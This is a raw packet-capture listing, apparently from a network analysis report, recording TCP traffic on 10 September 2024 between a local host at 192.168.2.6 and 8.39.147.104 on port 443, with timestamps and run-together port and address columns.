                                                                                Sep 10, 2024 16:33:41.054883957 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.054893970 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.054909945 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.055116892 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.055124044 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.055133104 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.055143118 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.055181026 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.055186033 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.055246115 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.055246115 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.055253029 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.055263996 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.055270910 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.055277109 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.055358887 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.055366039 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.055375099 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.055463076 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.055470943 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.055480957 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.055485010 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.055488110 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.055491924 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.055555105 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.055560112 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.055583000 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.055624962 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.055974007 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.056005955 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.056042910 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.056051016 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.056133986 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.056446075 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.056463957 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.056557894 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.056557894 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.056574106 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.072143078 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.072156906 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.072240114 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.072325945 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.283406019 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.285346985 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.285362005 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.285373926 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.285495996 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.287626982 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.287631035 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287640095 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287697077 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287739992 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.287744999 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287755966 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287785053 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.287808895 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287848949 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.287853003 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287868977 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287878990 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287892103 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.287898064 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287975073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.287976027 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.287981987 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287995100 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.288006067 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.288052082 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.288055897 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.288137913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.288137913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.288142920 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.288156033 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.288160086 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.288289070 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.288289070 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.303293943 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.303304911 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.303363085 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.305775881 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.312732935 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.312750101 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.312825918 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.312825918 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.312833071 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.313050032 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.313270092 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.313285112 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.313343048 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.313357115 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.313994884 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.314228058 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.314244032 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.314300060 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.314306974 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.314399004 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.315028906 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.315047026 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.315097094 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.315104961 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.315308094 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.317574024 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.317637920 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.317694902 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.317694902 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.317703009 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.317856073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.319566011 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.319607019 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.319658041 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.319664001 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.319686890 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.319699049 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.321068048 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.321110010 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.321151018 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.321158886 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.321207047 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.321207047 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.322606087 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.322788954 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.350179911 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.350220919 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.350263119 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.350276947 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.350322008 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.350322008 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.405247927 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.405288935 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.405340910 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.405359030 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.405411005 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.405445099 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.405689955 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.405735970 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.405766964 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.405772924 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.405800104 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.405853033 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.407990932 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.408035994 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.408097982 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.408104897 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.408134937 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.408489943 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.408570051 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.408624887 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.408678055 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.408678055 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.408685923 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.410370111 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.410625935 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.410671949 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.410722017 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.410727024 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.410748005 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.411003113 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.412223101 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.412265062 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.412321091 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.412327051 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.412378073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.412378073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.413269043 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.413319111 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.413377047 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.413383007 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.413440943 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.413440943 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.436636925 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.436697006 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.436783075 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.436783075 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.436795950 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.438951969 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.494565964 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.494626045 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.494693041 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.494693041 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.494704008 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.494776964 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.494829893 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.494844913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.494844913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.494872093 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.494923115 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.494923115 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.496078968 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.496128082 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.496166945 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.496171951 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.496191978 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.496191978 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.496383905 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.496613979 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.496654987 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.496690035 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.496696949 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.496707916 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.496834993 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.497961044 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.498011112 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.498054028 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.498066902 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.498105049 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.498105049 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.498436928 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.498480082 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.498526096 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.498532057 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.498564959 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.498564959 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.499954939 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.499998093 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.500030994 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.500037909 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.500183105 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.500184059 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.522850037 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.522905111 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.522957087 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.522964001 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.523019075 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.523211956 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.580698967 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.580734015 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.580816984 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.580832005 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.581363916 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.581660032 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.581726074 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.581757069 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.581764936 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.581809044 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.581840992 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.582154036 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.582200050 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.582242966 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.582248926 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.582262039 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.582715034 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.582762957 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.582843065 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.582843065 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.582850933 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.583971024 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.584007978 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.584038973 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.584045887 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.584090948 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.584129095 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.584511995 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.584547043 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.584583044 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.584589005 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.584626913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.584626913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.584953070 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.585944891 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.585982084 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.586025000 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.586031914 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.586081982 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.586119890 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.587838888 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.609204054 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.609263897 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.609361887 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.609361887 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.609380960 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.611054897 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.667272091 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.667346001 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.667409897 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.667427063 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.667439938 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.667496920 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.667762995 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.667807102 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.667843103 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.667850018 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.668135881 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.668252945 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.668951035 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.668996096 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.669042110 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.669049978 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.669075966 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.669238091 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.669572115 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.669620991 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.669647932 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.669653893 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.669699907 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.669699907 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.670747042 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.670793056 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.670859098 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.670859098 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.670866013 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.671066999 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.671273947 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.671315908 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.671349049 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.671355009 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.671377897 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.671406031 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.672687054 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.672739029 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.672789097 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.672796011 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.672808886 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.672846079 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.695080042 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.695130110 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.695188999 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.695202112 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.695218086 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.695322990 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.753273010 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.753326893 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.753405094 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.753405094 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.753417015 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.753493071 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.753806114 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.753851891 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.753906012 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.753906012 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.753912926 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.754184961 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.755152941 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.755196095 CEST443497188.39.147.104192.168.2.6
